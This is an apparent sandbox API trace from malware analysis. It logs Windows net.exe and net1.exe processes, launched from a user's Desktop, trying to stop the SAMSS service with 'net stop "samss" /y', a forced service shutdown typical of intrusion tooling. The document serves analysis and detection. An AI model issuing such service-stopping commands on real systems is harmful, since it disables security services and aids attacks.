returned="2191" [0269.903] FormatMessageW (in: dwFlags=0x2800, lpSource=0x3120002, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="More help is available by typing NET HELPMSG 2191.\r\n") returned 0x34 [0269.903] GetFileType (hFile=0x94) returned 0x2 [0269.903] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x30ef754 | out: lpMode=0x30ef754) returned 1 [0270.432] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x30ef760, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x30ef760*=0x34) returned 1 [0270.777] GetFileType (hFile=0x94) returned 0x2 [0270.777] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x30ef754 | out: lpMode=0x30ef754) returned 1 [0271.245] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30ef760, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x30ef760*=0x2) returned 1 [0271.761] NetApiBufferFree (Buffer=0x31384a0) returned 0x0 [0271.761] NetApiBufferFree (Buffer=0x31384b8) returned 0x0 [0271.761] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" [0271.761] exit (_Code=2) Thread: id = 13229 os_tid = 0xd968 Process: id = "55" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x19e75000" os_pid = "0xdaa4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"samss\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13307 os_tid = 0xdaa8 Thread: id = 13537 os_tid = 0xde20 Process: id = "56" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7935000" os_pid = "0xdb5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "55" os_parent_pid = "0xdaa4" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13353 os_tid = 0xdb60 Thread: id = 13360 os_tid = 0xdb7c Thread: id = 13394 os_tid = 0x10e8 Thread: id = 13455 os_tid = 0xdcd8 Thread: id = 13457 os_tid = 0xdce0 Process: id = "57" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x549c0000" os_pid = "0xde88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "55" os_parent_pid = "0xdaa4" cmd_line = "C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13563 os_tid = 0xde8c [0273.652] GetModuleHandleA (lpModuleName=0x0) returned 0x2a0000 [0273.653] __set_app_type (_Type=0x1) [0273.653] __p__fmode () returned 0x76953c14 [0273.653] __p__commode () returned 0x769549ec [0273.653] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2a6f20) returned 0x0 [0273.653] __getmainargs (in: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610, _DoWildCard=0, _StartInfo=0x2bf61c | out: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610) returned 0 [0273.653] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0273.653] GetConsoleOutputCP () returned 0x1b5 [0273.863] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x2c6fa0 | out: lpCPInfo=0x2c6fa0) returned 1 [0273.863] SetThreadUILanguage (LangId=0x0) returned 0x2de0409 [0274.036] sprintf_s (in: _DstBuf=0x2b6fa40, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0274.036] setlocale (category=0, locale=".437") returned="English_United States.437" [0274.038] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0274.038] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0274.038] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" [0274.038] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b6f7e8, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0274.038] RtlAllocateHeap (HeapHandle=0x31b0000, Flags=0x0, Size=0x5e) returned 0x31b4230 [0274.038] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0274.038] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2b6f7e4 | out: Buffer=0x2b6f7e4*=0x31b83b0) returned 0x0 [0274.038] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2b6f7e0 | out: Buffer=0x2b6f7e0*=0x31b8440) returned 0x0 [0274.038] __iob_func () returned 0x76952608 [0274.038] _fileno (_File=0x76952608) returned 0 [0274.038] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0274.038] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0274.038] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0274.039] _wcsicmp (_String1="config", _String2="stop") returned -16 [0274.039] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0274.039] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0274.039] _wcsicmp (_String1="file", _String2="stop") returned -13 [0274.039] _wcsicmp (_String1="files", _String2="stop") returned -13 [0274.039] _wcsicmp (_String1="group", _String2="stop") returned -12 [0274.039] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0274.039] _wcsicmp (_String1="help", _String2="stop") returned -11 [0274.039] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0274.039] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0274.039] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0274.039] _wcsicmp (_String1="session", _String2="stop") returned -15 [0274.039] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0274.039] _wcsicmp (_String1=0x2a1ffc, _String2="stop") returned -15 [0274.039] _wcsicmp (_String1="share", _String2="stop") returned -12 [0274.039] _wcsicmp (_String1="start", _String2="stop") returned -14 [0274.039] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0274.039] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0274.039] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0274.039] _wcsicmp (_String1="accounts", _String2="samss") returned -18 [0274.039] _wcsicmp (_String1="computer", _String2="samss") returned -16 [0274.039] _wcsicmp (_String1="config", _String2="samss") returned -16 [0274.039] _wcsicmp (_String1="continue", _String2="samss") returned -16 [0274.039] _wcsicmp (_String1="cont", _String2="samss") returned -16 [0274.039] _wcsicmp (_String1="file", _String2="samss") returned -13 [0274.039] _wcsicmp (_String1="files", _String2="samss") returned -13 [0274.039] _wcsicmp (_String1="group", _String2="samss") returned -12 [0274.039] _wcsicmp (_String1="groups", _String2="samss") returned -12 [0274.039] _wcsicmp (_String1="help", _String2="samss") returned -11 [0274.039] _wcsicmp (_String1="helpmsg", _String2="samss") returned -11 [0274.039] _wcsicmp (_String1="localgroup", _String2="samss") returned -7 [0274.040] _wcsicmp (_String1="pause", _String2="samss") returned -3 [0274.040] _wcsicmp (_String1="session", _String2="samss") returned 4 [0274.040] _wcsicmp (_String1="sessions", _String2="samss") returned 4 [0274.040] _wcsicmp (_String1="sess", _String2="samss") returned 4 [0274.040] _wcsicmp (_String1="share", _String2="samss") returned 7 [0274.040] _wcsicmp (_String1="start", _String2="samss") returned 19 [0274.040] _wcsicmp (_String1="stats", _String2="samss") returned 19 [0274.040] _wcsicmp (_String1="statistics", _String2="samss") returned 19 [0274.040] _wcsicmp (_String1="stop", _String2="samss") returned 19 [0274.040] _wcsicmp (_String1="time", _String2="samss") returned 1 [0274.040] _wcsicmp (_String1="user", _String2="samss") returned 2 [0274.040] _wcsicmp (_String1="users", _String2="samss") returned 2 [0274.040] _wcsicmp (_String1="msg", _String2="samss") returned -6 [0274.040] _wcsicmp (_String1="messenger", _String2="samss") returned -6 [0274.040] _wcsicmp (_String1="receiver", _String2="samss") returned -1 [0274.040] _wcsicmp (_String1="rcv", _String2="samss") returned -1 [0274.040] _wcsicmp (_String1="netpopup", _String2="samss") returned -5 [0274.040] _wcsicmp (_String1="redirector", _String2="samss") returned -1 [0274.040] _wcsicmp (_String1="redir", _String2="samss") returned -1 [0274.040] _wcsicmp (_String1="rdr", _String2="samss") returned -1 [0274.040] _wcsicmp (_String1="workstation", _String2="samss") returned 4 [0274.040] _wcsicmp (_String1="work", _String2="samss") returned 4 [0274.040] _wcsicmp (_String1="wksta", _String2="samss") returned 4 [0274.040] _wcsicmp (_String1="prdr", _String2="samss") returned -3 [0274.040] _wcsicmp (_String1="devrdr", _String2="samss") returned -15 [0274.040] _wcsicmp (_String1="lanmanworkstation", _String2="samss") returned -7 [0274.040] _wcsicmp (_String1="server", _String2="samss") returned 4 [0274.040] _wcsicmp (_String1="svr", _String2="samss") returned 21 [0274.040] _wcsicmp (_String1="srv", _String2="samss") returned 17 [0274.040] _wcsicmp (_String1="lanmanserver", _String2="samss") returned -7 [0274.040] _wcsicmp (_String1="alerter", _String2="samss") returned -18 [0274.040] _wcsicmp (_String1="netlogon", _String2="samss") returned -5 [0274.041] _wcsupr (in: _String="samss" | out: _String="SAMSS") returned="SAMSS" [0274.041] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x31c0648 [0274.044] GetServiceKeyNameW (in: hSCManager=0x31c0648, lpDisplayName="SAMSS", lpServiceName=0x2c8c28, lpcchBuffer=0x2b6f754 | out: lpServiceName="", lpcchBuffer=0x2b6f754) returned 0 [0274.045] _wcsicmp (_String1="msg", _String2="SAMSS") returned -6 [0274.045] _wcsicmp (_String1="messenger", _String2="SAMSS") returned -6 [0274.045] _wcsicmp (_String1="receiver", _String2="SAMSS") returned -1 [0274.045] _wcsicmp (_String1="rcv", _String2="SAMSS") returned -1 [0274.045] _wcsicmp (_String1="redirector", _String2="SAMSS") returned -1 [0274.045] _wcsicmp (_String1="redir", _String2="SAMSS") returned -1 [0274.045] _wcsicmp (_String1="rdr", _String2="SAMSS") returned -1 [0274.045] _wcsicmp (_String1="workstation", _String2="SAMSS") returned 4 [0274.045] _wcsicmp (_String1="work", _String2="SAMSS") returned 4 [0274.045] _wcsicmp (_String1="wksta", _String2="SAMSS") returned 4 [0274.045] _wcsicmp (_String1="prdr", _String2="SAMSS") returned -3 [0274.045] _wcsicmp (_String1="devrdr", _String2="SAMSS") returned -15 [0274.045] _wcsicmp (_String1="lanmanworkstation", _String2="SAMSS") returned -7 [0274.045] _wcsicmp (_String1="server", _String2="SAMSS") returned 4 [0274.045] _wcsicmp (_String1="svr", _String2="SAMSS") returned 21 [0274.045] _wcsicmp (_String1="srv", _String2="SAMSS") returned 17 [0274.045] _wcsicmp (_String1="lanmanserver", _String2="SAMSS") returned -7 [0274.045] _wcsicmp (_String1="alerter", _String2="SAMSS") returned -18 [0274.045] _wcsicmp (_String1="netlogon", _String2="SAMSS") returned -5 [0274.045] _wcsicmp (_String1="SAMSS", _String2="WORKSTATION") returned -4 [0274.045] _wcsicmp (_String1="SAMSS", _String2="LanmanWorkstation") returned 7 [0274.045] _wcsicmp (_String1="SAMSS", _String2="SERVER") returned -4 [0274.045] _wcsicmp (_String1="SAMSS", _String2="LanmanServer") returned 7 [0274.045] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0274.046] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0274.046] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0274.046] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0274.046] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0274.046] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0274.046] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0274.046] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0274.046] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0274.046] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0274.046] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0274.046] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0274.046] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0274.046] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0274.046] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0274.046] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0274.046] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0274.046] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0274.046] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0274.046] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0274.046] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0274.046] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0274.046] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0274.046] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0274.046] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0274.046] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0274.046] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0274.046] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0274.046] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0274.046] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0274.046] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x31c0918 [0274.047] OpenServiceW (hSCManager=0x31c0918, lpServiceName="SAMSS", dwDesiredAccess=0x84) returned 0x31c06c0 [0274.047] ResolveDelayLoadedAPI () returned 0x73f29e60 [0274.047] ControlService (in: hService=0x31c06c0, dwControl=0x4, lpServiceStatus=0x2b6f6d0 | out: lpServiceStatus=0x2b6f6d0*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0274.048] LocalAlloc (uFlags=0x40, uBytes=0x28) returned 0x31b4468 [0274.048] wcscpy_s (in: _Destination=0x31b4484, _SizeInWords=0x6, _Source="SAMSS" | out: _Destination="SAMSS") returned 0x0 [0274.048] CloseServiceHandle (hSCObject=0x31c0918) returned 1 [0274.048] CloseServiceHandle (hSCObject=0x31c06c0) returned 1 [0274.049] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x2b6f6b4 | out: Buffer=0x2b6f6b4*=0x31c02d0) returned 0x0 [0274.049] _wcsicmp (_String1="SAMSS", _String2="WORKSTATION") returned -4 [0274.049] _wcsicmp (_String1="SAMSS", _String2="LanmanWorkstation") returned 7 [0274.049] _wcsicmp (_String1="SAMSS", _String2="SERVER") returned -4 [0274.049] _wcsicmp (_String1="SAMSS", _String2="LanmanServer") returned 7 [0274.049] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0274.049] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0274.049] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0274.049] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0274.049] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0274.049] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0274.049] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0274.049] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0274.049] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0274.049] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0274.049] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0274.049] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0274.049] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0274.049] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0274.049] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0274.049] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0274.049] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0274.049] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0274.049] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0274.049] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0274.049] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0274.049] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0274.049] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0274.049] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0274.049] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0274.049] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0274.050] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0274.050] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0274.050] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0274.050] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0274.050] wcsncpy_s (in: _Destination=0x31c04a4, _SizeInWords=0x6, _Source="SAMSS", _MaxCount=0x5 | out: _Destination="SAMSS") returned 0x0 [0274.050] wcsncpy_s (in: _Destination=0x31c0498, _SizeInWords=0x6, _Source="SAMSS", _MaxCount=0x5 | out: _Destination="SAMSS") returned 0x0 [0274.050] NetApiBufferFree (Buffer=0x31b4468) returned 0x0 [0274.050] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x2b6f5d4 | out: Buffer=0x2b6f5d4*=0x31c1ff0) returned 0x0 [0274.050] OpenServiceW (hSCManager=0x31c0648, lpServiceName="SAMSS", dwDesiredAccess=0xc) returned 0x31c0878 [0274.050] QueryServiceStatus (in: hService=0x31c0878, lpServiceStatus=0x2b6f5d8 | out: lpServiceStatus=0x2b6f5d8*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0274.051] NetApiBufferFree (Buffer=0x31c1ff0) returned 0x0 [0274.051] CloseServiceHandle (hSCObject=0x31c0878) returned 1 [0274.051] wcscpy_s (in: _Destination=0x2c7610, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0274.051] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x2be0002 [0274.052] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x2be0002, dwMessageId=0x88f, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="The requested pause, continue, or stop is not valid for this service.\r\n") returned 0x47 [0274.053] GetFileType (hFile=0x94) returned 0x2 [0274.053] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x2b6f510 | out: lpMode=0x2b6f510) returned 1 [0274.321] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x2b6f51c, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x2b6f51c*=0x47) returned 1 [0274.618] GetFileType (hFile=0x94) returned 0x2 [0274.618] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x2b6f510 | out: lpMode=0x2b6f510) returned 1 [0274.774] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2b6f51c, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x2b6f51c*=0x2) returned 1 [0275.008] _ultow (in: _Dest=0x88f, _Radix=45544804 | out: _Dest=0x88f) returned="2191" [0275.008] FormatMessageW (in: dwFlags=0x2800, lpSource=0x2be0002, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="More help is available by typing NET HELPMSG 2191.\r\n") returned 0x34 [0275.009] GetFileType (hFile=0x94) returned 0x2 [0275.009] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x2b6f534 | out: lpMode=0x2b6f534) returned 1 [0275.196] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x2b6f540, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x2b6f540*=0x34) returned 1 [0275.461] GetFileType (hFile=0x94) returned 0x2 [0275.461] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x2b6f534 | out: lpMode=0x2b6f534) returned 1 [0275.727] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2b6f540, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x2b6f540*=0x2) returned 1 [0275.920] NetApiBufferFree (Buffer=0x31b83b0) returned 0x0 [0275.920] NetApiBufferFree (Buffer=0x31b8440) returned 0x0 [0275.920] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" [0275.920] exit (_Code=2) Thread: id = 13585 os_tid = 0xdee4